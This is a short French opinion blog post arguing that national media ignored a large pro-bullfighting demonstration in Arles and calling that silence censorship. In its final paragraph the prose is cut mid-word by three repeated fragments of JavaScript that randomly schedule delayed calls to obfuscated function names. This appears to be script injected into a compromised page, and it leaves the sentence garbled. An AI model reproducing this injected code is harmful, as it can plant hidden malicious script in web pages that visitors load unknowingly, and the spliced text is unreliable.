DESINFORMATION

Imaginez-vous une manifestation dans une ville d’un peu plus de 50 000 habitants et que les manifestants soient entre 6000 et 10 000, parmi eux le président de la région. S’il s’était déroulé contre un spectacle, dans ce cas les corridas, il ne fait aucun doute que tous les médias nationaux s’y seraient rués et on aurait eu droit à toutes sortes d’entretiens avec les manifestants en première page.

Mais à Arles ce fut le peuple du Toro qui se mobilisa et cela ne cadre pas l’idéologie bienpensante de certaines élites, même parmi les médias soit disant progressistes qui ne voudraient pas déranger d’éventuels annonceurs.

Ainsi on n’en parle pas et on tait une réalité culturelle, la volonté d’un peuple ou d’une partie de sa population. Comme s’ils n’existaient pas. Et c’est celle-là la pire des censures, curieusement d’habitude pratiquée dans des systèmes totalitaires  plutôt que dans pays ouverts à la pluralité d’opinions.

Mais n’allons pas nous auto-flageller comme d’habitude, au contraire nous devons nous féliciter du succès populaire de cette convocation et des arènes combles le même après-midi arlésien avec les meilleurs ingrédients pour que la Fiesta se perpétue : de grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ands toreros et les meilleurs élevages.

 photo jeanclaude carbonne

okmanif

Les commentaires sont fermés.